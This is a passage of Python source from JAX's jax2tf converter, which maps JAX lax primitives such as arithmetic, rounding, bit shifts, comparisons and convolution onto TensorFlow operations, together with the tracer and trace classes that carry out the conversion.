           val_dtype == tf.complex128 and aval_dtype == jnp.complex64)):
        # If JAX does not have x64 bit mode enabled, it will force the 64-bit
        # values to use 32-bit precision. In order to make the TF conversion
        # follow JAX's rules, we cast the TF values down to 32-bit mode.
        val = tf.cast(val, dtype=aval_dtype)
        val_dtype = aval_dtype

      if config.jax_enable_checks:
        assert aval_dtype == val_dtype, f"expected {aval_dtype} == {val_dtype}"
        for aval_dim, val_dim in util.safe_zip(
            self._aval.shape, val_shape):  # type: ignore[attr-defined]
          if val_dim is None:
            # An unknown TF dimension may only appear where the abstract
            # shape has a dimension variable.
            assert isinstance(
                aval_dim, shape_poly.DimVar
            ), f"expected {self._aval.shape} == {val_shape}"  # type: ignore[attr-defined]
          elif not isinstance(aval_dim, shape_poly.DimVar):
            assert aval_dim == val_dim, f"expected {self._aval.shape} == {val_shape}"  # type: ignore[attr-defined]
          else:
            # We have a TF value with known shape, and the abstract shape is a shape variable.
            try:
              aval_int = int(_eval_shape([aval_dim]))  # type: ignore
            except TypeError:
              # The dimension variable is not yet resolvable to an int.
              continue
            assert aval_int == val_dim, f"expected {self._aval.shape} == {val_shape}. Found {aval_int} != {val_dim}."  # type: ignore

      self.val = val
    else:  # Must be a numeric value
      self.val = _safe_convert_to_tensor(
          val, dtype=self._aval.dtype)  # type: ignore[attr-defined]

  @property
  def aval(self):
    return self._aval

  def full_lower(self):
    return self
class TensorFlowTrace(core.Trace):
  """Trace class that underlies the jax2tf transformation.

  We are going to ensure that jax2tf.convert is never nested inside other
  transformations. This is sufficient for intended use cases (converting
  fully-transformed JAX code). It also simplifies our job because we do not
  have to handle situations where we apply primitives on a mix of TF values
  and JAX tracers from an outer transformation. E.g., for addition both the
  TF values and the JAX tracers have an override and they get confused if
  they see values from the other world.

  Hence a TFT trace does not interact with non-TFT traces at lower-level. For
  higher-order control-flow primitives we invoke recursively
  _interpret_fun on the body of the conditional, which will create a nested TFT.

  We do want to allow transformations nested inside a TensorFlowTrace (TFT),
  but those will introduce their own MainTrace, and any operations involving
  those will be done on those traces, i.e., not a concern for TFT.
  """

  def pure(self, val: Union[TfVal, core.Unit]) -> TensorFlowTracer:
    """Lifts a non-Tracer into the TensorFlowTracer.

    This function may be called by way of trace.full_raise.

    The value may be a core.unit. During JAX transformations we sometimes
    produce a Jaxpr that has arguments of abstract value core.abstract_unit
    and results equal to core.unit. These are arguments and results that are
    not used in the computation.

    In TF world, we represent core.unit as NaN. This is safe, as these values
    should never be used.
    """
    if val is core.unit:
      return TensorFlowTracer(self, tf.constant(np.nan, tf.float32),
                              core.abstract_unit)
    else:
      shape, dtype = _tfval_shape_dtype(val)
      return TensorFlowTracer(self, val, core.ShapedArray(shape, dtype))

  def lift(self, val: core.Tracer) -> TensorFlowTracer:
    # This would be called when we need to raise a tracer from a lower-level
    # main into the TensorFlowTrace. Since the TensorFlowTrace is never nested
    # inside another transform, there are no lower-level main traces.
    assert False

  def sublift(self, val: TensorFlowTracer) -> TensorFlowTracer:
    # This is called when we need to raise a tracer from the same master,
    # but a lower sublevel. This could come from a nested jit.
    return TensorFlowTracer(self, val.val, val._aval)

  def process_primitive(self, primitive: core.Primitive,
                        tracers: Sequence[TensorFlowTracer],
                        params) -> TensorFlowTracer:
    # Looks up the TF implementation of `primitive` and applies it to the
    # boxed TF values, producing new tracer(s).
    impl, impl_needs_avals = self.get_primitive_impl(primitive)
    args_avals: Sequence[core.AbstractValue] = tuple(t.aval for t in tracers)
    out_aval = primitive.abstract_eval(*args_avals, **params)
    args_tf: Sequence[TfVal] = [t.val for t in tracers]
    if impl_needs_avals:
      val_out: TfVal = impl(
          *args_tf,
          _in_avals=args_avals,  # type: ignore
          _out_aval=out_aval,
          **params)
    else:
      val_out = impl(*args_tf, **params)
    if primitive.multiple_results:
      out = [
          TensorFlowTracer(self, v, a)
          for v, a in util.safe_zip(val_out, out_aval)
      ]  # type: ignore
    else:
      out = TensorFlowTracer(self, val_out, out_aval)  # type: ignore

    # Check that the impl rule returned a value of expected shape and dtype
    # TODO: adapt this to match polymorphic shapes
    if config.jax_enable_checks:
      if primitive.multiple_results:
        for o, expected_aval in zip(out, out_aval):  # type: ignore
          assert o.aval.strip_weak_type() == expected_aval.strip_weak_type(), (
              f"{primitive}: out.aval = {o.aval}; expected {expected_aval}")
      else:
        assert out.aval == out_aval, (  # type: ignore
            f"{primitive}: out.aval = {out.aval}; expected {out_aval}"
        )  # type: ignore
    return out  # type: ignore

  def process_call(self, call_primitive: core.Primitive, f: lu.WrappedFun,
                   tracers: Sequence[TensorFlowTracer], params):
    # Interprets the called function inline, in a sublevel of this trace.
    assert call_primitive.multiple_results
    vals: Sequence[TfVal] = [t.val for t in tracers]
    f = _interpret_subtrace(f, self.main, tuple(t.aval for t in tracers))
    with core.new_sublevel():
      if call_primitive == core.named_call_p:
        # Preserve the JAX name as a TF name scope.
        with tf.name_scope(_sanitize_scope_name(params["name"])):
          vals_out: Sequence[Tuple[TfVal, core.AbstractValue]] = \
            f.call_wrapped(*vals)
      elif call_primitive == sharded_jit.sharded_call_p:
        vals_out = _sharded_call(f, vals, **params)
      else:
        vals_out = f.call_wrapped(*vals)
    return [TensorFlowTracer(self, v, a) for v, a in vals_out]

  def post_process_call(self, call_primitive: core.Primitive,
                        out_tracers: Sequence[TensorFlowTracer], params):
    # We encountered a call primitive, e.g., remat_call_p, whose result
    # (out_tracers) include TensorFlowTracer that were not passed through
    # its arguments (captured from the environment).
    vals = tuple(t.val for t in out_tracers)
    main = self.main

    def todo(vals: Sequence[TfVal]):
      # Re-box the TF values as tracers at the then-current sublevel.
      trace = TensorFlowTrace(main, core.cur_sublevel())
      return [
          TensorFlowTracer(trace, v, out_tracer.aval)
          for v, out_tracer in util.safe_zip(vals, out_tracers)
      ]

    return vals, todo

  def process_map(self, map_primitive, f, tracers, params):
    raise NotImplementedError("process_map")

  def post_process_map(self, map_primitive, out_tracers, params):
    raise NotImplementedError("post_process_map")

  def process_custom_jvp_call(self, prim, fun, jvp, tracers):
    # Drop the custom differentiation rule and act like a call primitive. This
    # behavior is desirable because jax2tf stages code out of the JAX system, so
    # there are no more JAX differentiation transformations to be applied.
    del jvp  # Unused.
    return self.process_call(core.call_p, fun, tracers, {})

  def post_process_custom_jvp_call(self, out_tracers, params):
    assert False  # unreachable assuming jax2tf runs with clean trace state

  def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees):
    # Drop the custom differentiation rule and act like a call primitive. This
    # behavior is desirable because jax2tf stages code out of the JAX system, so
    # there are no more JAX differentiation transformations to be applied.
    del fwd, bwd, out_trees  # Unused.
    return self.process_call(core.call_p, fun, tracers, {})

  def post_process_custom_vjp_call(self, out_tracers, params):
    assert False  # unreachable assuming jax2tf runs with clean trace state

  def get_primitive_impl(self, p: core.Primitive) -> Tuple[Callable, bool]:
    # Returns the primitive implementation and whether the implementation
    # takes abstract values (see definition of tf_impl_with_avals)
    try:
      return tf_impl[p], False
    except KeyError:
      try:
        return tf_impl_with_avals[p], True
      except KeyError as err:
        msg = "TensorFlow interpretation rule for '{}' not implemented"
        raise NotImplementedError(msg.format(p)) from err
def to_tf_dtype(jax_dtype):
  """Converts a JAX dtype to the corresponding TF dtype.

  float0 has no TF counterpart and is mapped to bfloat16.
  """
  if jax_dtype == dtypes.float0:
    return tf.dtypes.as_dtype(dtypes.bfloat16)
  return tf.dtypes.as_dtype(jax_dtype)
def to_jax_dtype(tf_dtype):
  """Returns the NumPy dtype corresponding to a TF dtype."""
  numpy_dtype = tf_dtype.as_numpy_dtype
  return numpy_dtype
def _unexpected_primitive(p: core.Primitive, *args, **kwargs):
  # Placeholder impl for primitives that should never reach this interpreter.
  assert False, f"Encountered unexpected primitive {p}"


for unexpected in xla.call_translations:  # Call primitives are inlined
  tf_impl[unexpected] = functools.partial(_unexpected_primitive, unexpected)
# Primitives that are not yet implemented must be explicitly declared here.
tf_not_yet_impl = [
    "reduce",
    "rng_uniform",
    "clz",
    "igamma_grad_a",
    "random_gamma_grad",
    "reduce_precision",

    # Not high priority?
    "after_all",
    "all_to_all",
    "create_token",
    "infeed",
    "outfeed",
    # NOTE(review): "pmax_p" carries a "_p" suffix unlike the other entries
    # (and "pmax" also appears below) — confirm which spelling is intended.
    "pmax_p",
    "pmin",
    "ppermute",
    "psum",
    "pmax",
    "pgather",
    "axis_index",
    "pdot",
    "all_gather",
    "lu_pivots_to_permutation",
    "rng_bit_generator",
    "xla_pmap",
    "call_tf",
]
tf_impl[ad_util.stop_gradient_p] = tf.stop_gradient
tf_impl[ad_util.zeros_like_p] = tf.zeros_like


def _add(x: TfVal, y: TfVal) -> TfVal:
  # Addition via the raw AddV2 op; used for both lax.add_p and
  # ad_util.add_jaxvals_p.
  return tf.raw_ops.AddV2(x=x, y=y)


tf_impl[ad_util.add_jaxvals_p] = _add
# device_put is a no-op in TF: there is no device placement to perform here.
tf_impl[xla.device_put_p] = lambda x, device=None: x

tf_impl[lax.neg_p] = tf.math.negative
def _sign(x: TfVal) -> TfVal:
  """Sign function, with a workaround for unsigned integer dtypes."""
  if not x.dtype.is_unsigned:
    return tf.math.sign(x)
  # TF and XLA do not support tf.math.sign for unsigned types. Unsigned
  # values are never negative, so the sign is 0 for zero and 1 otherwise.
  zero = np.array(0, dtype=x.dtype)
  one = np.array(1, dtype=x.dtype)
  return tf.where(tf.math.equal(x, 0), zero, one)


tf_impl[lax.sign_p] = _sign
# Rounding-direction primitives.
tf_impl[lax.floor_p] = tf.math.floor
tf_impl[lax.ceil_p] = tf.math.ceil
def _round(operand, *, rounding_method):
  # Implements lax.round_p. tf.math.round rounds ties to even, so the
  # AWAY_FROM_ZERO method needs special handling of exact .5 fractions.
  if rounding_method is lax.RoundingMethod.AWAY_FROM_ZERO:
    # Reflect negatives to positives so "away from zero" becomes "up",
    # then restore the sign at the end.
    sign = _sign(operand)
    operand *= sign
    floor = tf.math.floor(operand)
    operand -= floor
    cond = tf.math.equal(operand, tf.constant(np.array(0.5), operand.dtype))
    # Exact .5 fractional parts round up; everything else defers to
    # tf.math.round on the fractional part.
    return sign * (
        tf.where(cond, tf.constant(np.array(1), operand.dtype),
                 tf.math.round(operand)) + floor)
  else:
    return tf.math.round(operand)


tf_impl[lax.round_p] = _round
tf_impl[lax.nextafter_p] = tf.math.nextafter
def _population_count(x):
  # Cast the result back, since tf.raw_ops.PopulationCount does not preserve
  # the input dtype.
  orig_dtype = x.dtype
  return tf.cast(tf.raw_ops.PopulationCount(x=x), orig_dtype)


tf_impl[lax.population_count_p] = _population_count
tf_impl[lax.is_finite_p] = tf.math.is_finite
def _abs(x: TfVal) -> TfVal:
  """Absolute value; unsigned inputs are returned unchanged."""
  if x.dtype.is_unsigned:
    # TF and XLA do not support tf.math.abs for unsigned types, but an
    # unsigned value is already its own absolute value.
    return x
  return tf.math.abs(x)


tf_impl[lax.abs_p] = _abs
tf_impl[lax.pow_p] = tf.math.pow
def _integer_pow(x, *, y: int, _in_avals: Sequence[core.AbstractValue],
                 _out_aval: core.AbstractValue):
  # Follows the implementation in lax._integer_pow_translation_rule
  if y == 0:
    # x**0 == 1, broadcast to the output shape.
    return tf.broadcast_to(
        tf.constant(1, dtype=x.dtype, shape=()), _eval_shape(_out_aval.shape))
  is_reciprocal = y < 0
  if is_reciprocal:
    y = -y
  # Exponentiation by squaring on |y|.
  acc = None
  while y > 0:
    if y & 1:
      acc = x if acc is None else tf.math.multiply(acc, x)
    y >>= 1
    if y > 0:
      x = tf.math.multiply(x, x)
  return tf.math.reciprocal(acc) if is_reciprocal else acc


tf_impl_with_avals[lax.integer_pow_p] = _integer_pow
# Elementwise transcendental / special-function primitives map directly to
# their tf.math counterparts.
tf_impl[lax.exp_p] = tf.math.exp
tf_impl[lax.expm1_p] = tf.math.expm1
tf_impl[lax.log_p] = tf.math.log
tf_impl[lax.log1p_p] = tf.math.log1p
tf_impl[lax.tan_p] = tf.math.tan
tf_impl[lax.tanh_p] = tf.math.tanh
tf_impl[lax.sin_p] = tf.math.sin
tf_impl[lax.sinh_p] = tf.math.sinh
tf_impl[lax.cos_p] = tf.math.cos
tf_impl[lax.cosh_p] = tf.math.cosh
tf_impl[lax.acos_p] = tf.math.acos
tf_impl[lax.asin_p] = tf.math.asin
tf_impl[lax.atan_p] = tf.math.atan
tf_impl[lax.atan2_p] = tf.math.atan2
tf_impl[lax.acosh_p] = tf.math.acosh
tf_impl[lax.atanh_p] = tf.math.atanh
tf_impl[lax.asinh_p] = tf.math.asinh
tf_impl[lax.sqrt_p] = tf.math.sqrt
tf_impl[lax.rsqrt_p] = tf.math.rsqrt
tf_impl[lax.lgamma_p] = tf.math.lgamma
tf_impl[lax.digamma_p] = tf.math.digamma
tf_impl[lax.igamma_p] = tf.math.igamma
tf_impl[lax.igammac_p] = tf.math.igammac
tf_impl[lax.regularized_incomplete_beta_p] = tf.math.betainc
tf_impl[lax.erf_p] = tf.math.erf
tf_impl[lax.erfc_p] = tf.math.erfc
tf_impl[lax.erf_inv_p] = tf.math.erfinv
tf_impl[lax.bessel_i0e_p] = tf.math.bessel_i0e
tf_impl[lax.bessel_i1e_p] = tf.math.bessel_i1e

tf_impl[lax.complex_p] = tf.complex
def _conj(x, **kwargs):
  """Complex conjugate; real inputs are widened to the matching complex dtype.

  The only dtypes that are allowed are: float32, float64, complex64, and
  complex128.
  """
  _REAL_TO_COMPLEX = {tf.float32: tf.complex64, tf.float64: tf.complex128}
  complex_dtype = _REAL_TO_COMPLEX.get(x.dtype)
  if complex_dtype is not None:
    # Conjugating a real value is a no-op apart from the dtype widening.
    return tf.cast(x, complex_dtype)
  return tf.math.conj(x)


tf_impl[lax.conj_p] = _conj
tf_impl[lax.real_p] = tf.math.real
tf_impl[lax.imag_p] = tf.math.imag

# Basic arithmetic.
tf_impl[lax.add_p] = _add
tf_impl[lax.sub_p] = tf.math.subtract
tf_impl[lax.mul_p] = tf.math.multiply
def _iota(*, dtype, shape, dimension):
  dtype = to_tf_dtype(dtype)
  # Some dtypes are unsupported, like uint32, so we just fall back to int32.
  # TODO(mattjj, necula): improve tf.range dtype handling
  shape_tf = _eval_shape(shape)
  vec = tf.range(tf.cast(shape_tf[dimension], tf.int32), dtype=tf.int32)
  # Reshape the 1D range so it broadcasts along `dimension`.
  vec_shape = [-1 if i == dimension else 1 for i in range(len(shape))]
  return tf.cast(tf.broadcast_to(tf.reshape(vec, vec_shape), shape_tf), dtype)


tf_impl[lax.iota_p] = _iota
def _div(lhs, rhs):
  # Division. For integers, tf.math.floordiv rounds toward -inf, so the
  # quotient is adjusted by +1 when the operands have different signs and the
  # division is not exact, yielding round-toward-zero behavior.
  if lhs.dtype.is_integer:
    quotient = tf.math.floordiv(lhs, rhs)
    select = tf.math.logical_and(
        tf.not_equal(_sign(lhs), _sign(rhs)),
        tf.not_equal(tf.math.floormod(lhs, rhs), 0))
    return tf.where(select, quotient + 1, quotient)
  else:
    return tf.math.truediv(lhs, rhs)
def _rem(lhs, rhs):
  # Remainder carrying the sign of the dividend, built from floormod on the
  # absolute values.
  return _sign(lhs) * tf.math.floormod(_abs(lhs), _abs(rhs))


tf_impl[lax.div_p] = _div
tf_impl[lax.rem_p] = _rem
tf_impl[lax.max_p] = tf.math.maximum
tf_impl[lax.min_p] = tf.math.minimum

# Map from TF signed types to TF unsigned types.
_SIGNED_TO_UNSIGNED_TABLE = {
    tf.int8: tf.uint8,
    tf.int16: tf.uint16,
    tf.int32: tf.uint32,
    tf.int64: tf.uint64,
}

# Map from TF unsigned types to TF signed types.
_UNSIGNED_TO_SIGNED_TABLE = {u: s for s, u in _SIGNED_TO_UNSIGNED_TABLE.items()}


# Note: Bitwise operations only yield identical results on unsigned integers!
# pylint: disable=protected-access
def _shift_right_arithmetic_raw(x, y):
  """Arithmetic right shift; unsigned dtypes are routed through signed ones."""
  if not x.dtype.is_unsigned:
    return tf.bitwise.right_shift(x, y)
  # For unsigned inputs, cast to the signed counterpart, shift, and cast
  # back, so the result matches the signed-shift semantics.
  assert x.dtype == y.dtype
  orig_dtype = x.dtype
  signed_dtype = _UNSIGNED_TO_SIGNED_TABLE[orig_dtype]
  shifted = tf.bitwise.right_shift(tf.cast(x, signed_dtype),
                                   tf.cast(y, signed_dtype))
  return tf.cast(shifted, orig_dtype)
def _shift_right_arithmetic(x, y):
  # TF shift is "implementation defined" if the shift amount is negative
  # or larger or equal to the size of the value. We implement the XLA
  # semantics to return the shift by the max value (x_bits - 1).
  # TODO: it is likely better to add XlaOps for shifts
  x_bits = 8 * x.dtype.size
  # Clamp out-of-bounds shift amounts to x_bits - 1.
  clamp_y = tf.where(_shift_in_bounds(x, y), y, x_bits - 1)
  return _shift_right_arithmetic_raw(x, clamp_y)


tf_impl[lax.shift_right_arithmetic_p] = _shift_right_arithmetic
def _shift_right_logical_raw(x, y):
  # Logical right shift; signed dtypes are routed through their unsigned
  # counterpart so the shift fills with zeros instead of sign-extending.
  if x.dtype.is_unsigned:
    return tf.bitwise.right_shift(x, y)
  else:
    assert x.dtype == y.dtype
    orig_dtype = x.dtype
    unsigned_dtype = _SIGNED_TO_UNSIGNED_TABLE[orig_dtype]
    x = tf.cast(x, unsigned_dtype)
    y = tf.cast(y, unsigned_dtype)
    res = tf.bitwise.right_shift(x, y)
    return tf.cast(res, orig_dtype)
def _shift_right_logical(x, y):
  # TF shift is "implementation defined" if the shift amount is negative
  # or larger or equal to the size of the value. We implement the XLA semantics
  # to return 0.
  # TODO: it is likely better to add XlaOps for shifts
  return tf.where(
      _shift_in_bounds(x, y), _shift_right_logical_raw(x, y), tf.zeros_like(x))


tf_impl[lax.shift_right_logical_p] = _shift_right_logical
def _shift_left(x, y):
  """Left shift, returning 0 for out-of-bounds shift amounts.

  TF shift is "implementation defined" if the shift amount is negative or
  larger or equal to the size of the value. We implement the XLA semantics
  to return 0.
  """
  # TODO: it is likely better to add XlaOps for shifts
  in_bounds = _shift_in_bounds(x, y)
  shifted = tf.bitwise.left_shift(x, y)
  return tf.where(in_bounds, shifted, tf.zeros_like(x))


tf_impl[lax.shift_left_p] = _shift_left
def _shift_in_bounds(x: TfVal, y: TfVal) -> TfVal:
  # Return the TF expression for when y is within bounds (0 <= y < |x|)
  x_bits = 8 * x.dtype.size
  # TF does not have comparisons for uint16 and uint32 (despite what the
  # documentation says)
  y_comp = tf.cast(
      y, _UNSIGNED_TO_SIGNED_TABLE[y.dtype]) if y.dtype.is_unsigned else y
  y_lt_x_bits = tf.math.less(y_comp, x_bits)
  y_ge_0 = tf.math.greater_equal(y_comp, 0)
  return tf.logical_and(y_lt_x_bits, y_ge_0)
def _not(x):
  """Computes bitwise not, with special handling for booleans.

  Numpy and JAX support bitwise not for booleans by applying a logical not!
  This means that applying bitwise_not yields an unexpected result:
    jnp.bitwise_not(jnp.array([True, False]))
    >> DeviceArray([False, True], dtype=bool)
  if you assume that booleans are simply casted to integers.
    jnp.bitwise_not(jnp.array([True, False]).astype(np.int32)).astype(bool)
    >> DeviceArray([True, True], dtype=bool)
  """
  return tf.logical_not(x) if x.dtype == tf.bool else tf.bitwise.invert(x)


tf_impl[lax.not_p] = _not
def bool_to_int8(f, argnums):
  """Computes bool valued functions using int8.

  Wraps `f` so that tf.bool arguments at positions `argnums` are cast to
  tf.int8 before the call and the outputs are cast back to tf.bool. Also
  rewrites the `_in_avals`/`_out_aval` keyword arguments (when present) to
  use int8, keeping them consistent with the cast values.
  """
  argnums = tf.nest.flatten(argnums)

  def wrapper(*args, **kwargs):
    if not any(args[i].dtype == tf.bool for i in argnums):
      # No boolean arguments: call through unchanged.
      return f(*args, **kwargs)
    else:
      args_cast = [(tf.cast(a, tf.int8) if i in argnums else a)
                   for i, a in enumerate(args)]
      if "_in_avals" in kwargs:

        def cast_aval(aval):
          return core.ShapedArray(aval.shape, np.int8)

        _in_avals_cast = [
            cast_aval(aval) if i in argnums else aval
            for i, aval in enumerate(kwargs["_in_avals"])
        ]
        _out_aval_cast = tf.nest.map_structure(cast_aval, kwargs["_out_aval"])
        kwargs = dict(
            kwargs, _in_avals=_in_avals_cast, _out_aval=_out_aval_cast)
      out = f(*args_cast, **kwargs)
      return tf.nest.map_structure(lambda o: tf.cast(o, tf.bool), out)

  return wrapper
# Boolean bitwise ops are computed via int8 (see bool_to_int8 above).
tf_impl[lax.or_p] = bool_to_int8(tf.bitwise.bitwise_or, argnums=(0, 1))
tf_impl[lax.and_p] = bool_to_int8(tf.bitwise.bitwise_and, argnums=(0, 1))
tf_impl[lax.xor_p] = bool_to_int8(tf.bitwise.bitwise_xor, argnums=(0, 1))

# Comparisons.
tf_impl[lax.eq_p] = tf.math.equal
tf_impl[lax.ne_p] = tf.math.not_equal
tf_impl[lax.ge_p] = tf.math.greater_equal
tf_impl[lax.gt_p] = tf.math.greater
tf_impl[lax.le_p] = tf.math.less_equal
tf_impl[lax.lt_p] = tf.math.less

tf_impl[lax_linalg.cholesky_p] = tf.linalg.cholesky
def _convert_element_type(operand, *, new_dtype, weak_type=False):
  """Implementation of lax.convert_element_type_p.

  Complex -> non-complex conversions keep only the real part, and
  float -> integer/bool conversions truncate toward zero; a plain tf.cast
  alone would not reproduce both behaviors.
  """
  old_dtype = operand.dtype.as_numpy_dtype
  if (dtypes.issubdtype(old_dtype, np.complexfloating) and
      not dtypes.issubdtype(new_dtype, np.complexfloating)):
    # Drop the imaginary part before casting.
    operand = tf.math.real(operand)
  if (dtypes.issubdtype(old_dtype, np.floating) and
      not (dtypes.issubdtype(new_dtype, np.floating) or dtypes.issubdtype(
          new_dtype, np.complexfloating) or new_dtype == np.bool_)):
    # Truncate toward zero: floor the magnitude, then restore the sign.
    sign = _sign(operand)
    operand = sign * tf.math.floor(sign * operand)
  return tf.dtypes.cast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.convert_element_type_p] = _convert_element_type
def _bitcast_convert_type(operand, new_dtype):
  """Reinterprets the bits of `operand` as `new_dtype` (lax.bitcast_convert_type_p)."""
  target_dtype = to_tf_dtype(new_dtype)
  return tf.bitcast(operand, target_dtype)
tf_impl[lax.bitcast_convert_type_p] = _bitcast_convert_type
def _clamp(minval, operand, maxval, *, _in_avals, _out_aval):
  """Implementation of lax.clamp_p.

  Broadcasts both bounds to the operand's shape and lowers the minimum bound
  to maxval wherever maxval < minval, mirroring JAX's behavior in that case.
  """
  operand_shape = _eval_shape(_in_avals[1].shape)
  upper = tf.broadcast_to(maxval, operand_shape)
  lower = tf.math.minimum(tf.broadcast_to(minval, operand_shape), upper)
  return tf.clip_by_value(operand, lower, upper)
tf_impl_with_avals[lax.clamp_p] = _clamp
def _concatenate(*operands, dimension):
  """Implementation of lax.concatenate_p via tf.concat."""
  return tf.concat(list(operands), axis=dimension)
tf_impl[lax.concatenate_p] = _concatenate
def _conv_general_dimension_numbers_proto(dimension_numbers):
  """Converts a ConvDimensionNumbers to an XLA ConvolutionDimensionNumbers."""
  assert isinstance(dimension_numbers, lax.ConvDimensionNumbers)
  lhs_spec, rhs_spec, out_spec = dimension_numbers
  proto = xla_data_pb2.ConvolutionDimensionNumbers()
  # In each spec, position 0 is the batch (resp. kernel-output) dimension,
  # position 1 is the feature dimension, and the rest are spatial dimensions.
  proto.input_batch_dimension = lhs_spec[0]
  proto.input_feature_dimension = lhs_spec[1]
  proto.output_batch_dimension = out_spec[0]
  proto.output_feature_dimension = out_spec[1]
  proto.kernel_output_feature_dimension = rhs_spec[0]
  proto.kernel_input_feature_dimension = rhs_spec[1]
  proto.input_spatial_dimensions.extend(lhs_spec[2:])
  proto.kernel_spatial_dimensions.extend(rhs_spec[2:])
  proto.output_spatial_dimensions.extend(out_spec[2:])
  return proto
def _precision_config_proto(precision: Optional[Tuple[PrecisionType,
                                                      PrecisionType]]):
  """Converts an optional pair of precisions to an XLA PrecisionConfig proto."""
  if precision is None:
    return None
  proto = xla_data_pb2.PrecisionConfig()
  proto.operand_precision.extend(int(p) for p in precision)
  return proto
def _try_tf_conv(lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
                 dimension_numbers, feature_group_count, batch_group_count,
                 preferred_element_type: Optional[DType],
                 out_shape) -> TfVal:
  """Attempts to convert a lax convolution without using XLA ops.

  Only a subset of convolutions can be expressed through tf.nn.convolution /
  tf.nn.conv_transpose; every unsupported configuration raises the exception
  built by `error` below.
  """

  def error(msg):
    # Builds (does not raise) the "XLA disabled" exception with a uniform hint.
    suffix = ("See source code for the precise conditions under which "
              "convolutions can be converted without XLA.")
    return _xla_disabled_error("conv_general_dilated", f"{msg} - {suffix}")

  # TODO(bchetioui): this function is not exhaustive wrt which convolution cases
  # can be translated into TF primitives. Further investigation is needed to
  # fully flesh it out.
  if lhs.dtype not in [tf.float16, tf.float32, tf.float64]:
    raise error(f"tf.nn.convolution is not supported for dtype {lhs.dtype}")
  if feature_group_count != 1:
    raise error("tf.nn.convolution does not support grouped convolutions")
  # TODO(bchetioui): is there something to do with batch_group_count?
  if batch_group_count != 1:
    raise error("Unimplemented support for batch_group_count != 1")
  nb_spatial_dimensions = len(lhs.shape) - 2
  # TF can only deal with 1D, 2D and 3D convolution
  if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
    raise error("TensorFlow can only handle convolutions with 1, 2, or 3 "
                "spatial dimensions")
  # TODO(bchetioui): handle different stride cases
  if list(window_strides) != [1] * nb_spatial_dimensions:
    raise error("Unimplemented support for window_strides != "
                f"{tuple([1] * nb_spatial_dimensions)}")
  if preferred_element_type is not None and preferred_element_type != lhs.dtype:
    raise error("Unimplemented support for preferred_element_type")

  def convert_padding() -> str:
    # Maps the explicit `padding` pairs back to a TF padding string.
    # TODO(bchetioui): in this instance, we can not use padtype_to_pads as
    # string padding is not implemented for transposed convolution.
    if list(lhs_dilation) != [1] * nb_spatial_dimensions:
      raise error("Padding conversion is not supported for transposed "
                  "convolution.")
    lhs_perm, rhs_perm, _ = dimension_numbers
    # Effective kernel extent once rhs (atrous) dilation is applied.
    effective_rhs_shape = [
        (k - 1) * r + 1
        for k, r in zip(np.take(rhs.shape, rhs_perm)[2:], rhs_dilation)
    ]
    lhs_shape = np.take(lhs.shape, lhs_perm)[2:]
    # TF only allows 'VALID' and 'SAME' padding
    for pad_str in ["VALID", "SAME"]:
      gen_padding = lax.padtype_to_pads(
          lhs_shape, effective_rhs_shape, window_strides, pad_str)
      if list(gen_padding) == list(padding):
        return pad_str
    raise error("Input padding not supported in TensorFlow.")

  def convert_dim_nums() -> str:
    # Maps the lax dimension numbers to a TF data_format string.
    lhs_spec, rhs_spec, out_spec = dimension_numbers
    # TF only allows filters with shape:
    # spatial_filter_shape + [in_channels, out_channels]. In JAX however,
    # rhs_spec is represented as a tuple containing the following:
    # [out_channels, in_channels] + spatial_filter_shape.
    supported_rhs_shape = ([nb_spatial_dimensions + 1, nb_spatial_dimensions] +
                           list(range(nb_spatial_dimensions)))
    if list(rhs_spec) != supported_rhs_shape:
      raise error("Input filter (RHS) shape format not supported in "
                  "TensorFlow.")
    # TF only supports same LHS and output data format
    if lhs_spec != out_spec:
      raise error("TensorFlow requires the same data format for LHS and "
                  "output.")
    # Alphabet extracted from the documentation of tf.conv{1,2,3}d
    spatial_dim_alphabet = "DHW"[-nb_spatial_dimensions:]
    # TF only supports the following data formats:
    # - [batch_size, in_channels] + input_spatial_shape
    # TODO(bchetioui): TF currently does not support the above on CPU. To avoid
    # failing on this platform, this path is commented out for now.
    # if list(lhs_spec) == list(range(len(lhs_spec))):
    #   return "NC" + spatial_dim_alphabet
    # - [batch_size] + input_spatial_shape + [in_channels]
    if list(lhs_spec) == ([0, len(lhs_spec) - 1] +
                          list(range(1,
                                     len(lhs_spec) - 1))):
      return "N" + spatial_dim_alphabet + "C"
    raise error("Data format is unsupported by TensorFlow.")

  def convert_dilation_and_compute_result(tf_padding: str,
                                          tf_dim_nums: str) -> TfVal:
    # Dispatches to plain/atrous tf.nn.convolution or tf.nn.conv_transpose.
    no_dilation = [1] * nb_spatial_dimensions
    # TODO(bchetioui): is there a generic way to do a transposed atrous
    # convolution in TensorFlow?
    if not (list(lhs_dilation) == no_dilation or
            list(rhs_dilation) == no_dilation):
      raise error("Both LHS and RHS dilations are set.")
    # This is a non-dilated or atrous convolution
    if list(lhs_dilation) == no_dilation:
      return tf.nn.convolution(
          lhs,
          rhs,
          strides=window_strides,
          padding=tf_padding,
          data_format=tf_dim_nums,
          dilations=rhs_dilation)
    # TODO(bchetioui): the below path is unreachable for now, as passing a lhs
    # dilation to this function will result in convert_padding returning None
    # systematically. This must be investigated further.
    # Dilation of the LHS is transposed convolution
    return tf.nn.conv_transpose(
        lhs,
        rhs,
        out_shape,
        window_strides,
        padding=tf_padding,
        data_format=tf_dim_nums,
        dilations=lhs_dilation)

  tf_padding = convert_padding()
  tf_dim_nums = convert_dim_nums()
  return convert_dilation_and_compute_result(tf_padding, tf_dim_nums)
def _conv_general_dilated(lhs, rhs, *,
                          window_strides, padding, lhs_dilation,
                          rhs_dilation,
                          dimension_numbers: lax.ConvDimensionNumbers,
                          feature_group_count: int,
                          batch_group_count: int,
                          lhs_shape: Sequence[int],
                          rhs_shape: Sequence[int],
                          precision: Optional[Tuple[PrecisionType,
                                                    PrecisionType]],
                          preferred_element_type: Optional[DType],
                          _in_avals: Sequence[core.AbstractValue],
                          _out_aval: core.AbstractValue):
  """Implementation of lax.conv_general_dilated_p using XlaConv.

  Falls back to `_try_tf_conv` (a partial tf.nn.convolution-based path) when
  XLA ops are disabled. Complex-valued convolutions are decomposed into three
  real XlaConv calls.
  """
  out_tf_shape = _aval_to_tf_shape(_out_aval)
  if not _enable_xla:
    return _try_tf_conv(
        lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
        dimension_numbers, feature_group_count, batch_group_count,
